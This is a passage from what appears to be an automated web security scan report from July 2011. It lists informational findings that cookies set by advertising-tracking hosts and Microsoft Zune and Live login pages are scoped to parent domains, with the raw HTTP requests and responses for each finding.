Set-Cookie: udm_0=MLv3NzMJZjpn3tsfwP0KOUz16+gnQCV8thMJiG9y0/Ny8RycOj5Ee7W6976f+6q5uEkCljxs8/kkfUBkYkyv8Z6yN0Nd4WTv6nXi+wXts6Wq9fr6i0BVdAbUIt5q/AIu1tFMoLa+s5ybvovc1/sBiFagcmNZNEVOe/GUhqpvMMfBuED2AAtbTPmHja7LcOz4agTWi1koiKCTVv3qzk/79Qe2uPaQ6S7kAtoomuw/f8LKElRxy0cr+w2LkZjOKbucdRZZ24QaRgKaY1AMwZ8CSy1q4Bj7frnr33+NAZ28K2eqWTRzqHhiemYOPzFThvMc/LKh+lxjqccKlpfLelX3klLEP/sLoQ0P6lQ6cdNVQb3x2dZu7Uos9MOBqUHAZBkGUV3WmZ+rBDbbykBkJ5ScL50YNQGZrrt/HsYLSFJ1iQJDtX0BBMQEhE9Bm6B8KTU2B/+Tl9/z5z97+8PbD0lxNA1yRZRhLlb5N+vXpOlVXGaet4LJUbUUroApU+zR8PD394xJmJO9uIGq3nczsCCgrviDk+wlwWBJxAe13ViEqMDGFqe/XYaHMLv4FfqGe9RDrkTiBsaURaU2tBuJuF4kcSjipIKo96BoAvnIgAQ5aQ6FMjFLmtDIaStvMYiow+kEShGdJz3hz2UWdehqqamV60647IIuCZ+2HMgzX1GZgTEwazFHHp14F2bopoWcS2XxRiPNuV43PLbWFQQYi4x8RbB7WZm3LZ5eAPFGPKP4lN/t3r6q2cvFC5xKH/C339zgf6wBbxY94vTIz3EVEmF37yH7WQ2IlDvlP5iqu6GwMlroZWZrWzZMhKjhXtVtLXnZKSEns45kweQXxc2zCs3qojoqj2qFHg4a001Z3yDllrXDwJAabHr5Wgc8y0BK/ofvDL7XHaSeEoljUxm9KkuLGCjfF1XYBkwuTVBNiJq8RqvSzK64qnZNRty5Q3h+StSof0aki+YNsomLdXGPiZWX83jCDKbTjSbj+hizDjviNSkx95cRiMmuryNaSdO05sUVi0qRJJJ9SmIHgtrm1PNCY2hXEpu1dsy5NhOU+gzwUFDzEHOsk2pWeFPfriTzXqIi4lN39TQllYCaGXn3ezQvFSjSIkIQwrkm6gBJ7gnTgRD6A5cOwIfQk9fSDSkvblZRDLqroqhO7bgYjuN+LcdM7Ve/43ZMpUERWhIMXfXy1aRrqf0LRfLalQrCDEjP9qJjlsKLTUkEX48QSaBB30VpKn8uFiU71y39ztY0ldEI6fKW0WZsvLi8RNNHwzwryegZdQNPqY3GCxrbPQglNmlJ/0AOv7efwM/lfzF+7EddIkVoJVC7/CnqGwbss3ro70EGZ/mHLDffQxKNs69LCdqfNz2d2IN/jFjEJIGfyu9hj+Y6Lz7/Aoq345+vsZJOQhUFmcZDdEjolfrv25Qs8YHoKtsd9x5OzwOMNHipu490I83yu94a7iWqDHgrR1yr/uMAvscudgUa3pQaYfusrPhHFl7VKw3dNYub5VjRz/zdMjAI8H/NhNVSkBt7UhNNkE91CvD5ucCHrIOsYwCTJ/k4LgHZO+JlPvGagrFzQG+/cazoZiKfk+Ww3aKjqgESDiv6pV05xqMO1JCtyp++YSQ0Fjk/q8DmQ3I694az4HJyeF0doaYqdgDTaemIgsk09TF0P3eY8qsFTdBqwFsRImeaUnZysTD9OAL/JihvJz1KIY9BLAr9MXTPdigmKhIA+N9hzv9imoMFmleig5A5x4f13nj0feG7vc77b2lf+9Hm5HyLNCOJjtCy8n1SLMSrosCmjbfKBA2fP1sWx3WrLZIf0ePVlA==; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/
Last-Modified: Wed, 06 Jul 2011 14:00:43 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 06 Jul 2011 15:00:43 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:43 GMT
Content-Length: 5681

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9.19. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=msftie9drcpc_cs=1&betq=12682=433083 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; BASE=x7Q9ni23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHhGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOID7s5rzN9mUM7Zk/KlL!; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; F1=BQ+HN4EBAAAABAAAAUAAqBA; ROLL=U6APDjegFREW39A!; C2=swDFOFJwCob0FNysICwJoakBtKvAC0nhXLpwIg02FAHCdbdBwhwihXAcIwjmGAHCsGeBwhAQvaAcIQW4FAHCLppBwhAmhXAcIAY4FAHCdDmBwhAmoZAcIwtlGAHCEHoBwhwoyaAcIU1aGAHCBHoBwhgdeZAcIYZgGAHC1mpBwhgHXaAcI0soGAHCX8rBwhAG/aAcIYxvGAHCKopBwhQ2kXAcIUEoGAHCVGoBwhgh3ZAcRGQYmjohS0I9GsfzFU9shNwjkak1k6hA1WjBpD7gCw8jGp+tSLAr8ao60mvAz8qhr7qHGwyfGahh3iyKgW8q; GUID=MTMwOTk0ODk3MjsxOjE2dDUxa28wOTRrMGt1OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 06 Jul 2011 15:39:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=XGIFOFJwCob0FSRsKiwubaActKvAC0nxILpwIg02FFGCdbdRhhwihXUYIwjmGFGCsGeRhhAQvaUYIQW4FFGCLppRhhAmhXUYIAY4FFGCdDmRhhAmoZUYIwtlGFGCEHoRhhwoyaUYIU1aGFGCBHoRhhgdeZUYIYZgGFGC1mpRhhgHXaUYI0soGFGCX8rRhhAG/aUYIYxvGFGCKopRhhQ2kXUYIUEoGFGCVGoRhhgh3ZUYRGQYmjoxD0I9GsfzFZ8shNwjka4xk6hA1WjRaD7gCw8jGu9tSLAr8a820mvAz8qxc7qHGwyfGfgh3iyKgWQn; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: GUID=MTMwOTk2Njc0MzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; domain=advertising.com; expires=Fri, 05-Jul-2013 15:39:03 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 06 Jul 2011 16:39:03 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/bottomCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/bottomCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7554
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:03 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:03 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:03 GMT
Connection: close
Content-Length: 4813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.21. https://live.zune.net/xweb/passport/rightCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/rightCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/rightCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: b2db948c-3538-4620-8179-ed9314b7b5a4,734190
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: BSID=YJGgishn1FDOIHzbSuUPMCAIAABGs7BB5jvMASqQqOHLGf5OFjo09weF0q3UOnx8; domain=.zune.net; path=/
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:39:01 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: z_dto_minfo=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: supportedTuner=Undefined; path=/
Set-Cookie: z_email=; expires=Sun, 03-Jul-2011 14:09:01 GMT; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:09:01 GMT; path=/
lx-svr: S804
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:09:01 GMT
Connection: close
Content-Length: 5984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.22. https://live.zune.net/xweb/passport/topCB.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/topCB.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xweb/passport/topCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
eid: e16080d6-37d3-4938-9cb2-f9f14681964f,7548
lx-exp: zunenet_music_buyButtonUX,Force,C
X-AspNet-Version: 2.0.50727
Set-Cookie: EXPAllTREATMENTS=zunenet_music_buyButtonUX=C; domain=.zune.net; expires=Wed, 06-Jul-2011 14:38:58 GMT; path=/
Set-Cookie: EXPCONTEXTHASZUNEPASS=False; domain=.zune.net; path=/
Set-Cookie: lastCulture=en-US; domain=.zune.net; expires=Tue, 06-Jul-2021 14:08:58 GMT; path=/
lx-svr: S803
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:57 GMT
Connection: close
Content-Length: 4616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/20
...[SNIP]...

9.23. http://m.adnxs.com/msftcookiehandler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3dE361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByDua)_c8i=$Q>#Pvc?C)P`v@4k0ctqVFM6=0:/(ks:NJow1z9ZK#?lOhm8V#v*7V*E?1lu=H(C*gZx2Ss=I?O/(z']Jx6M-Yi:*bjdCbN.KrKr`@`A[R[IBgy43C@cY2=dfT]IeCUBz69MK3ZUHfnG%ibT_/3-3m.rkh<amjMpWU-*-0Mb+H4y9%P6$Em=F5/V)pO[bZ]mCjKOvYhqRW`a$!QSz7rjRQ:*8M8)%:B[r1vowtVtRH]hjeJl_)9VrN=mFVq3sWLxB]G+VoQOkA7hBRzJ+=^m0Pe)kdaZvNipde7=7[-I#UWot%[$8UCate]WFQ/8*1FSM[7oDlL69<g*fJhpk`_4m05/^79%>*qB=kgR%FhNv(fz5jjk]##:H9`-6G'N]hl:'q6B!1TA>AYt/cEb:`C1Xr3UnD3@1NrztYAoL7ej0/!sPnUHG[>??u?v0KnVr6xKD6NXx@s!ixnTl5I*kZ[_6(`Q7Tq60)ra)#eyePji't21Q`i'CXwEAlUsslmO6c75hE^dm`4aV!iQpu)IMN+9HTTY7v^6]L'_?tY-2m)dTbp_>b8n$fnCKg(zP#*b#WTu.#2]xa(=4I+KTweO!TDHdQ:U-8yV2+e^BGZtf+oc5Gye`@h[wA>fUiG@vI3`o_5^kvHLg]PGyQZoWI>PnoCLnRwd%)7wxrg=H6J:vUQt'5*dU50F]3DuO^8CGS!l/e`A`<>>>BRHx`!u)fSLhN:qx-N5UHv_DRuWHU33e4.aTc:EU8iA1:ERF28?G[jOx/eR:8=g^)[wR/#

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:11 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Wed, 06 Jul 2011 11:22:11 GMT

GIF89a.............!.......,........@..L..;

9.24. https://msnia.login.live.com/ppsecure/post.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

9.25. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1 HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 11:21:55 GMT
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: bbid=AF3T0Zvr3k_eAKyttHO-2Y1-pj49skQ7XBb4DdQez_xwtEQ2i2wCqlfNJBcdkfO00ZvFh22PnRrg; Domain=.brilig.com; Expires=Fri, 28-Jun-2041 11:21:55 GMT
Set-Cookie: tc="26:4499"; Version=1; Domain=.brilig.com; Max-Age=946080000; Expires=Fri, 28-Jun-2041 11:21:55 GMT
X-Brilig-D: D=6320
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 133

<iframe frameborder='0' src='http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999'width='0' height='0'></iframe>

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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